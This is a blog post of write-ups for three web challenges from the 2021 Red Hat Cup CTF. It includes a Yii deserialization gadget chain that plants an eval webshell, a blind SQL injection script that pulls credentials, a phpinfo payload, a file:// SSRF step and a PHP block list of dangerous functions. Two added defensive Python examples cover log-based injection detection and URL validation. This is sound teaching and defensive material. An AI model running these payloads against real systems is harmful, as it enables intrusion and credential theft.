0xdawn's blog
May 10, 2021 / September 22, 2021

2021 红帽杯 (Red Hat Cup) writeup

Web

find_it

dirsearch found a robots.txt, which lists 1ndexx.php.

Requesting it directly shows nothing; checking for an editor swap file, .1ndexx.php.swp gives the source:

<?php

#Really easy...

$file=fopen("flag.php","r") or die("Unable 2 open!");

$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));

$hack=fopen("hack.php","w") or die("Unable 2 open");

$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
    die("you die");
}
if(strlen($a)>33){
    die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

Payload:

http://eci-2zegg15ya7y4this8qz2.cloudeci1.ichunqiu.com/index.php?code=%3C?php%20phpinfo();

Open hack.php; the flag is in the environment variables shown by phpinfo().

framework

Yii deserialization RCE. The source is in www.zip; it is enough to adjust the known gadget chain slightly:

https://xz.aliyun.com/t/8307

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'assert';
            $this->id = 'file_put_contents("shell.php","<?php eval(\$_POST[pass]);");';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}

namespace yii\db{
    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;

        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>

Connect with AntSword (蚁剑) to http://eci-2ze3l5mg59msjyj8xpg5.cloudeci1.ichunqiu.com/shell.php

Then use the AntSword plugin to bypass disable_functions.

WebsiteManger

image.php?id=3 is injectable; testing by hand, image.php?id=3/**/or/**/1=1 works.

Blind injection script:

import requests

url = 'http://eci-2ze56uon9iidfu8xxa70.cloudeci1.ichunqiu.com/image.php?id=3/**/or/**/1='

def main():
    result = ""
    for i in range(1, 200):
        # binary search over the printable ASCII range for the i-th character
        low = 32
        high = 128
        while low < high:
            mid = int((low + high) / 2)
            content = "select/**/group_concat(username,':',password)/**/from/**/users"
            # content = "select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()"
            # content = "select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='users'"
            sql = f"if(ascii(substr(({content}),{i},1))<{mid},1,2)"
            url2 = url+sql
            r = requests.get(url2)
            # the true branch returns the original page; the body length tells the two cases apart
            if len(r.content) == 50811:
                high = mid
            else:
                low = mid + 1
        if low == high == 32:
            # no character at this position: the string is exhausted
            print(result)
            break
        result += chr(int((high + low - 1) / 2))
        print(result)
        #admin:1288a7689e3c735652a72

if __name__ == '__main__':
    main()
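The script above tells true from false by response length and sends one request per bit of every character, which is exactly the pattern a defender can look for in access logs. The following is an added Python example, not from the original writeup: it parses constructed combined-format log lines (IPs and hostnames are made up; the `id` parameter being an integer is an assumption about image.php) and flags requests whose parameters carry inline-comment whitespace, an `if(ascii(substr(` probe, an `or 1=` tautology or schema enumeration, then aggregates per source, keeping the distinct response sizes of flagged requests, because boolean-based blind extraction shows up as one source alternating between exactly two sizes.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (Apache/nginx combined format, trailing fields
# omitted). IPs and hostnames are made up; the query shapes mirror the
# boolean-based blind injection discussed above.
SAMPLE_LOG = """\
10.0.0.7 - - [10/May/2021:12:00:01 +0800] "GET /image.php?id=3 HTTP/1.1" 200 50811
10.0.0.7 - - [10/May/2021:12:00:02 +0800] "GET /image.php?id=3/**/or/**/1=1 HTTP/1.1" 200 50811
10.0.0.9 - - [10/May/2021:12:00:03 +0800] "GET /image.php?id=3/**/or/**/1=if(ascii(substr((select/**/group_concat(username,':',password)/**/from/**/users),1,1))<80,1,2) HTTP/1.1" 200 50811
10.0.0.9 - - [10/May/2021:12:00:03 +0800] "GET /image.php?id=3/**/or/**/1=if(ascii(substr((select/**/group_concat(username,':',password)/**/from/**/users),1,1))<104,1,2) HTTP/1.1" 200 1337
10.0.0.9 - - [10/May/2021:12:00:04 +0800] "GET /image.php?id=3%2F%2A%2A%2For%2F%2A%2A%2F1%3Dif%28ascii%28substr%28%28select%2F%2A%2A%2Fgroup_concat%28username%2C%27%3A%27%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%29%2C1%2C1%29%29%3C92%2C1%2C2%29 HTTP/1.1" 200 50811
10.0.0.12 - - [10/May/2021:12:00:05 +0800] "GET /image.php?id=4 HTTP/1.1" 200 50811
10.0.0.12 - - [10/May/2021:12:00:06 +0800] "GET /index.php HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Indicators evaluated on the URL-decoded, lower-cased parameter value.
INDICATORS = {
    "inline_comment_whitespace": re.compile(r"/\*.*?\*/"),
    "boolean_probe": re.compile(r"\bif\s*\(\s*ascii\s*\(\s*substr\s*\("),
    "tautology": re.compile(r"\bor\b\s*(?:/\*.*?\*/\s*)*\d+\s*="),
    "schema_enumeration": re.compile(r"information_schema|group_concat\s*\("),
}
# Indicators that justify an alert on their own.
STRONG = {"boolean_probe", "tautology", "schema_enumeration"}
# Parameters the application defines as integers (assumption for image.php).
NUMERIC_PARAMS = {"id"}


def classify_request(target):
    """Return the sorted list of indicator names triggered by one request target."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    found = set()
    for name, values in params.items():
        for value in values:
            lowered = value.lower()
            found.update(label for label, pat in INDICATORS.items() if pat.search(lowered))
            # a type violation on its own is worth flagging: the handler expects digits
            if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
                found.add("non_numeric_id")
    return sorted(found)


def analyse(log_text):
    """Aggregate per source IP: request count, flagged count, indicators seen and
    the distinct response sizes of flagged requests."""
    report = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        entry = report.setdefault(
            m["ip"], {"total": 0, "flagged": 0, "indicators": set(), "flagged_sizes": set()}
        )
        entry["total"] += 1
        hits = classify_request(m["target"])
        if hits:
            entry["flagged"] += 1
            entry["indicators"].update(hits)
            if m["size"] != "-":
                entry["flagged_sizes"].add(int(m["size"]))
    for entry in report.values():
        entry["indicators"] = sorted(entry["indicators"])
        entry["flagged_sizes"] = sorted(entry["flagged_sizes"])
    return report


def alerts(report):
    """Sources worth an analyst's attention: a strong indicator, or several flagged
    requests whose responses come in exactly two sizes (the true/false oracle)."""
    out = []
    for ip, e in report.items():
        two_size_oracle = e["flagged"] >= 2 and len(e["flagged_sizes"]) == 2
        if STRONG & set(e["indicators"]) or two_size_oracle:
            out.append(ip)
    return sorted(out)


if __name__ == "__main__":
    rep = analyse(SAMPLE_LOG)
    for ip in alerts(rep):
        print(ip, rep[ip])
```

Detection of this kind is a secondary control; the fix belongs in image.php, where `id` should be bound as an integer parameter of a prepared statement rather than concatenated into the query text.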

After logging in there is a curl feature; use the file:// protocol to read the flag.
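A curl feature that forwards a user-supplied URL is a server-side request forgery sink, and file:// is only one of the schemes that must never reach the fetcher. The following is an added Python example, not part of the writeup: a `validate_fetch_url` check (the function name and the allow-listed hosts are assumptions) that accepts only http and https, refuses embedded credentials and IP literals, labels any literal that is not a public address, and requires the hostname to be on an explicit allow-list.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed allow-list standing in for whatever hosts the feature legitimately needs.
ALLOWED_HOSTS = {"img.example.com", "cdn.example.com"}


def validate_fetch_url(url, allowed_hosts=ALLOWED_HOSTS):
    """Decide whether a user-supplied URL may be handed to the server-side fetcher.
    Returns (accepted, reason)."""
    try:
        parts = urlsplit(url)
    except ValueError as exc:  # e.g. an unbalanced IPv6 bracket
        return False, f"unparseable URL: {exc}"
    # file://, gopher://, dict:// and the rest never reach curl: only web schemes
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme or '(none)'}"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL"
    host = parts.hostname  # already lower-cased by urlsplit
    if not host:
        return False, "missing host"
    # IP literals are refused outright; the reason distinguishes the dangerous case
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None:
        if not ip.is_global:  # loopback, private, link-local, ...
            return False, f"non-public address: {ip}"
        return False, "IP literals not allowed; use an allow-listed hostname"
    if host not in allowed_hosts:
        return False, f"host not on allow-list: {host}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in (
        "file:///etc/hostname",
        "http://127.0.0.1/",
        "http://[::1]/",
        "http://169.254.169.254/",
        "http://user@img.example.com/",
        "https://img.example.com/a.png",
    ):
        print(candidate, validate_fetch_url(candidate))
```

The hostname allow-list is what actually closes the hole: a scheme check alone still lets a name that resolves to a loopback or link-local address through, and a deployment that must accept arbitrary hostnames has to resolve the name itself, check the resolved address with the same `is_global` test, and connect to that exact address instead of letting curl resolve it a second time.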

©2022 0xdawn's blog | Powered by WordPress and Superb Themes!